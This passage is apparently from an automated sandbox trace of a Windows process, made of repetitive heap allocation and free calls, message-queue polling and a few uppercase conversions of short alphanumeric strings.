Flags=0x0, Size=0x20) returned 0x2a781b0 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0213.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0213.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0213.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0213.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0213.890] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0213.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0213.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0213.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0213.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0213.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0213.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0213.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0213.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0213.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0213.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0213.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0213.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0213.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0213.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0213.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0213.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0213.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0213.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0213.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0213.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0213.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0213.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0213.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0213.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0213.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0213.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0213.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0213.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0213.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0213.896] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0213.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab368 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0213.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0213.897] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0213.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0213.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0213.898] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4e8 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854a58 [0213.898] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0213.898] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0213.898] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0213.899] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854a58 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0213.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0213.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0213.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0213.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0213.900] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab728 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854398 [0213.900] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, 